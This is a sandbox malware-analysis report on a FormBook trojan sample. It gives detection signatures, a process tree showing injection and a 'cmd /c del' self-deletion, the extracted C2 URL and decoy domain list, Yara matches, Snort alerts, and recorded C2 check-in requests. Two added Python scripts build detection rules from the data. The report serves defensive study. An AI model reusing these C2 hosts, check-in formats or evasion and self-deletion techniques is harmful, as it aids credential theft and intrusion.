Windows Analysis Report Fu94e0b1TR

Overview

General Information

Sample Name: Fu94e0b1TR (renamed file extension from none to exe)
Analysis ID: 502374
MD5: 6429aa83e4bc083b4f0b3f44b0d7950f
SHA1: 0ead59881f054284f611accb61451ed1ffc818fc
SHA256: 96c57ae661562e958e01bb0b490c09a0a51bb367931620223174963de88bdfcb
Tags: 32, exe, trojan

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • Fu94e0b1TR.exe (PID: 4628 cmdline: 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 4840 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
    • Fu94e0b1TR.exe (PID: 2848 cmdline: C:\Users\user\Desktop\Fu94e0b1TR.exe MD5: 6429AA83E4BC083B4F0B3F44B0D7950F)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 3204 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 1844 cmdline: /c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
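The chain above (sample re-executing itself twice, explorer.exe carrying the network activity, a SysWOW64 NETSTAT.EXE spawning `cmd.exe /c del` against the original sample) is the part of this report a detection engineer can turn into rules. The following is an added example, not part of the Joe Sandbox report: EVENTS is constructed from the Process Tree section in the shape of Sysmon Event ID 1 records, the launcher of PID 4628 and the image path of cmd.exe are assumed because the report does not give them, and the explorer.exe edge is kept as the report nests it although the signatures ("Maps a DLL or memory area into another process", "Queues an APC in another process") indicate injection rather than a CreateProcess, so no rule below treats that edge as a spawn.

```python
"""Triage rules for the process chain in the report above.

Added example; not part of the Joe Sandbox report. EVENTS is constructed from
the Process Tree section (PID, parent PID, image, command line); nothing here
was captured from a host.
"""
import ntpath
import re

# Constructed from the report's process tree. The parent of PID 4628 and the
# image path of cmd.exe are not in the report and are assumed.
EVENTS = [
    dict(pid=4628, ppid=0,    image=r"C:\Users\user\Desktop\Fu94e0b1TR.exe", cmdline=r"'C:\Users\user\Desktop\Fu94e0b1TR.exe'"),
    dict(pid=4840, ppid=4628, image=r"C:\Users\user\Desktop\Fu94e0b1TR.exe", cmdline=r"C:\Users\user\Desktop\Fu94e0b1TR.exe"),
    dict(pid=2848, ppid=4628, image=r"C:\Users\user\Desktop\Fu94e0b1TR.exe", cmdline=r"C:\Users\user\Desktop\Fu94e0b1TR.exe"),
    # Nested under 2848 in the report because of injection, not a CreateProcess.
    dict(pid=3472, ppid=2848, image=r"C:\Windows\Explorer.EXE", cmdline=r"C:\Windows\Explorer.EXE"),
    dict(pid=3204, ppid=3472, image=r"C:\Windows\SysWOW64\NETSTAT.EXE", cmdline=r"C:\Windows\SysWOW64\NETSTAT.EXE"),
    dict(pid=1844, ppid=3204, image=r"C:\Windows\SysWOW64\cmd.exe",  # path assumed
         cmdline=r"/c del 'C:\Users\user\Desktop\Fu94e0b1TR.exe'"),
    dict(pid=4308, ppid=1844, image=r"C:\Windows\system32\conhost.exe", cmdline=r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
]

# System utilities that are leaf processes in normal use; netstat.exe is the one
# this report shows as an injection target, the set can be extended per environment.
NO_CHILDREN_EXPECTED = {"netstat.exe", "ipconfig.exe"}


def base(image):
    return ntpath.basename(image).lower()


def index_by_pid(events):
    return {e["pid"]: e for e in events}


def ancestors(by_pid, pid):
    """Yield parent, grandparent, ... until the chain leaves the data set."""
    seen = set()
    cur = by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        yield cur


def find_self_delete(by_pid):
    """cmd.exe /c del <X> where X is the image path of one of its ancestors."""
    hits = []
    for e in by_pid.values():
        if base(e["image"]) != "cmd.exe":
            continue
        m = re.search(r"\bdel\s+['\"]?([^'\"]+?\.exe)", e["cmdline"], re.I)
        if not m:
            continue
        target = m.group(1).lower()
        for anc in ancestors(by_pid, e["pid"]):
            if anc["image"].lower() == target:
                hits.append((e["pid"], anc["pid"]))   # (cmd.exe pid, deleted ancestor pid)
                break
    return hits


def find_leaf_spawning_child(by_pid):
    """A utility that should never have children spawned something."""
    return [(e["ppid"], e["pid"]) for e in by_pid.values()
            if e["ppid"] in by_pid and base(by_pid[e["ppid"]]["image"]) in NO_CHILDREN_EXPECTED]


def find_self_respawn(by_pid):
    """Parent and child share an image path: the sample re-launching itself,
    which this report pairs with 'Creates a process in suspended mode' and
    'Sample uses process hollowing technique'."""
    return [(e["ppid"], e["pid"]) for e in by_pid.values()
            if e["ppid"] in by_pid and by_pid[e["ppid"]]["image"].lower() == e["image"].lower()]


def triage(events):
    by_pid = index_by_pid(events)
    return {
        "self_delete": find_self_delete(by_pid),
        "leaf_spawned_child": find_leaf_spawning_child(by_pid),
        "self_respawn": find_self_respawn(by_pid),
    }


if __name__ == "__main__":
    for rule, hits in triage(EVENTS).items():
        print(f"{rule:20s} {hits}")
```

The self-delete rule walks ancestry rather than only the direct parent on purpose: here the deleted binary is three hops above cmd.exe, and a parent-only rule would miss it.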

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.fis.photos/ef6c/"], "decoy": ["gicaredocs.com", "govusergroup.com", "conversationspit.com", "brondairy.com", "rjtherealest.com", "xn--9m1bq8wgkag3rjvb.com", "mylori.net", "softandcute.store", "ahljsm.com", "shacksolid.com", "weekendmusecollection.com", "gaminghallarna.net", "pgonline111.online", "44mpt.xyz", "ambrandt.com", "eddytattoo.com", "blendeqes.com", "upinmyfeels.com", "lacucinadesign.com", "docomoau.xyz", "xn--90armbk7e.online", "xzq585858.net", "kidzgovroom.com", "lhznqyl.press", "publicationsplace.com", "jakante.com", "csspadding.com", "test-testjisdnsec.store", "lafabriqueabeilleassurances.com", "clf010.com", "buybabysnuggle.com", "uzmdrmustafaalperaykanat.com", "levanttradegroup.com", "arcflorals.com", "kinglot2499.com", "freekagyans.com", "region10group.gmbh", "yeyelm744.com", "thehomedesigncentre.com", "vngc.xyz", "szesdkj.com", "charlottewright.online", "planetgreennetwork.com", "pacifica7.com", "analogueadapt.com", "sensorypantry.com", "narbaal.com", "restaurant-utopia.xyz", "golnay.com", "szyyglass.com", "redelirevearyseuiop.xyz", "goldsteelconstruction.com", "discovercotswoldcottages.com", "geniuseven.net", "apricitee.com", "stopmoshenik.online", "ya2gh.com", "instatechnovelz.com", "dbe648.com", "seifjuban.com", "conquershirts.store", "totalcovidtravel.com", "pamperotrabajo.com", "satellitphonestore.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author (matched strings listed under each entry)

Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
  • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
  • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
  • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp | Rule: JoeSecurity_AntiVM_3 | Description: Yara detected AntiVM_3 | Author: Joe Security
Source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
(24 entries in total; the remaining entries are not reproduced here)

Unpacked PEs

Source | Rule | Description | Author (matched strings listed under each entry)

Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x15ca9:$sqlite3step: 68 34 1C 7B E1
  • 0x15dbc:$sqlite3step: 68 34 1C 7B E1
  • 0x15cd8:$sqlite3text: 68 38 2A 90 C5
  • 0x15dfd:$sqlite3text: 68 38 2A 90 C5
  • 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(8 entries in total; the remaining entries are not reproduced here)
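Two things in the Yara tables are worth checking by hand rather than taking on trust: what the matched byte sequences are, and why the same string sits at 0x8608 in the memory dump and the `.raw.unpack` artifact but at 0x7808 in the rebuilt `.unpack` PE. The following is an added example, not part of the report or of either rule set: the sequences and offsets are copied from the tables above, the buffer they are scanned in is constructed here (zero-filled with the sequences planted at the memory-dump offsets) rather than the real dump, and the instruction annotations are the editor's decoding of the opcodes.

```python
"""Decode what the Yara hits above match and check the offset relationship
between the memory dump and the rebuilt PE.

Added example; the scanned buffer is constructed, not the sample's memory.
"""
import struct

# Rule strings copied from the tables above ($name: hex bytes).
SEQUENCES = {
    "sequence_0":  "03 C8 0F 31 2B C1 89 45 FC",
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
}

# (offset in 00000006...00400000 memory dump, offset in 6.2...400000.0.unpack) for the same string.
OFFSET_PAIRS = [(0x8608, 0x7808), (0x146a5, 0x138a5), (0x16aa9, 0x15ca9), (0x1ac1a, 0x19e1a)]


def hexbytes(s):
    return bytes.fromhex(s.replace(" ", ""))


def scan(buf, sequences):
    """Return {name: [offsets]} for every occurrence of each sequence."""
    hits = {}
    for name, hx in sequences.items():
        pat, offs, start = hexbytes(hx), [], 0
        while (i := buf.find(pat, start)) != -1:
            offs.append(i)
            start = i + 1
        hits[name] = offs
    return hits


def annotate(name, pat):
    """Decode the two instruction shapes these particular rules rely on."""
    if len(pat) == 5 and pat[0] == 0x68:                    # 68 imm32 = push imm32
        imm = struct.unpack("<I", pat[1:])[0]
        return f"push 0x{imm:08X}  ; constant the rule names after {name} (FormBook resolves APIs by hash)"
    if pat == b"\x03\xc8\x0f\x31\x2b\xc1\x89\x45\xfc":
        # 03 C8 add ecx,eax | 0F 31 rdtsc | 2B C1 sub eax,ecx | 89 45 FC mov [ebp-4],eax
        return "add ecx,eax / rdtsc / sub eax,ecx / mov [ebp-4],eax  ; RDTSC timing check"
    return "unannotated"


def layout_delta(pairs):
    """The single constant by which dump offsets exceed .unpack offsets, or None."""
    deltas = {a - b for a, b in pairs}
    return deltas.pop() if len(deltas) == 1 else None


def build_buffer(plants, size=0x20000):
    """Constructed buffer with the sequences planted at chosen offsets."""
    buf = bytearray(size)
    for off, pat in plants:
        buf[off:off + len(pat)] = pat
    return bytes(buf)


# Planted at the memory-dump offsets the report lists.
PLANTS = [
    (0x8608, hexbytes(SEQUENCES["sequence_0"])),  (0x8992, hexbytes(SEQUENCES["sequence_0"])),
    (0x16aa9, hexbytes(SEQUENCES["sqlite3step"])), (0x16bbc, hexbytes(SEQUENCES["sqlite3step"])),
    (0x16ad8, hexbytes(SEQUENCES["sqlite3text"])), (0x16aeb, hexbytes(SEQUENCES["sqlite3blob"])),
]

if __name__ == "__main__":
    buf = build_buffer(PLANTS)
    for name, offs in scan(buf, SEQUENCES).items():
        print(f"{name:12s} {[hex(o) for o in offs]}  {annotate(name, hexbytes(SEQUENCES[name]))}")
    print("dump - unpack offset delta:", hex(layout_delta(OFFSET_PAIRS)))
```

`$sequence_0` is the RDTSC delta that the signature "Tries to detect virtualization through RDTSC time measurements" refers to, and the three JPCERT strings are `push` of 32-bit constants, which is why they match in memory but not in the packed .NET file on disk. The delta of 0xE00 holds for every pair in the two tables, so a rule offset that does not line up between the dump and the `.unpack` artifact is a layout difference between the raw memory image and the rebuilt PE, not evidence of a second payload.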

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook (configuration as reproduced in the Malware Configuration section above)
Yara detected FormBook
Source: Yara match, file source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 6.2.Fu94e0b1TR.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Fu94e0b1TR.exe.3c84fc0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0.2.Fu94e0b1TR.exe.3c3ada0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000006.00000002.370028583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.513567456.0000000000A20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000000.333414635.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.513760624.0000000000A50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000007.00000000.311554346.000000000FAD6000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.371224121.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.282740924.0000000003B19000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, file source: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, file source: 00000006.00000002.371120002.0000000000CF0000.00000040.00020000.sdmp, type: MEMORY
Source: 6.2.Fu94e0b1TR.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: Fu94e0b1TR.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Fu94e0b1TR.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netstat.pdbGCTL, source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
Source: Binary string: netstat.pdb, source: Fu94e0b1TR.exe, 00000006.00000002.371455073.0000000001150000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP, source: Fu94e0b1TR.exe, 00000006.00000002.371484148.0000000001160000.00000040.00000001.sdmp; NETSTAT.EXE, 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb, source: Fu94e0b1TR.exe; NETSTAT.EXE
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe, Code function: 4x nop then pop ebx, 6_2_00406ABB
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe, Code function: 4x nop then pop edi, 6_2_0040C37C
Source: C:\Users\user\Desktop\Fu94e0b1TR.exe, Code function: 4x nop then pop edi, 6_2_0040C3E9
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop ebx, 18_2_003C6ABB
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 18_2_003CC37C
Source: C:\Windows\SysWOW64\NETSTAT.EXE, Code function: 4x nop then pop edi, 18_2_003CC3E9

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49795 -> 64.190.62.111:80
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 192.0.78.24:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe, Domain query: www.instatechnovelz.com
Source: C:\Windows\explorer.exe, Network Connect: 172.65.227.72 80
Source: C:\Windows\explorer.exe, Domain query: www.apricitee.com
Source: C:\Windows\explorer.exe, Domain query: www.shacksolid.com
Source: C:\Windows\explorer.exe, Network Connect: 64.190.62.111 80
Source: C:\Windows\explorer.exe, Domain query: www.brondairy.com
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe, Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: www.fis.photos/ef6c/
Source: Joe Sandbox View, ASN Name: NBS11696US
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
Source: global traffic, HTTP traffic detected:
  GET /ef6c/?BJB=7nO80D&yrTlglv8=KSHN/72DEJPyd/OuGOIXNFBSZoOhZSSqcZP1Rqc2bg8KEPsXLZdPsQK+HlsXn3Jp1PaC HTTP/1.1
  Host: www.apricitee.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: global traffic, HTTP traffic detected:
  GET /ef6c/?yrTlglv8=JeohSOzXiZYIapiQlSWyFy7AWxQU0a2IMxMIOt5NBtSaZYcWimwRehmIZ/KtIrBMaY3r&BJB=7nO80D HTTP/1.1
  Host: www.shacksolid.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00 (Data Ascii: empty)
Source: Joe Sandbox View, IP Address: 64.190.62.111
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: Fu94e0b1TR.exe, 00000000.00000003.252645289.00000000059A1000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: Fu94e0b1TR.exe, 00000000.00000002.277178151.0000000002B11000.00000004.00000001.sdmp, String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: Fu94e0b1TR.exe, 00000000.00000002.285145562.0000000005964000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: Fu94e0b1TR.exe, 00000000.00000003.257245826.000000000599C000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/%
Source: Fu94e0b1TR.exe, 00000000.00000003.257106060.0000000005999000.00000004.00000001.sdmp; Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlr
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp; Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Fu94e0b1TR.exe, 00000000.00000003.259327134.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlx
Source: Fu94e0b1TR.exe, 00000000.00000003.259563222.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers5
Source: Fu94e0b1TR.exe, 00000000.00000003.259630894.0000000005999000.00000004.00000001.sdmp; Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersK
Source: Fu94e0b1TR.exe, 00000000.00000003.258524788.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersP
Source: Fu94e0b1TR.exe, 00000000.00000003.267018453.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersiva
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com7
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comD
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comF
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comFk
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comI.TTF
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comR.TTF
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comalicu
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comd
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comdito
Source: Fu94e0b1TR.exe, 00000000.00000003.260965748.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comessed
Source: Fu94e0b1TR.exe, 00000000.00000003.260583802.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comk
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comt
Source: Fu94e0b1TR.exe, 00000000.00000003.259708004.000000000596F000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comtuta
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: Fu94e0b1TR.exe, 00000000.00000003.252060604.000000000599A000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: Fu94e0b1TR.exe, 00000000.00000003.252293628.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Fu94e0b1TR.exe, 00000000.00000003.263851133.0000000005999000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/k
Source: Fu94e0b1TR.exe, 00000000.00000003.264392875.000000000599E000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/denQ
Source: Fu94e0b1TR.exe, 00000000.00000002.285470132.0000000006BF2000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Fu94e0b1TR.exe, 00000000.00000003.264185208.000000000597A000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmNormaldk
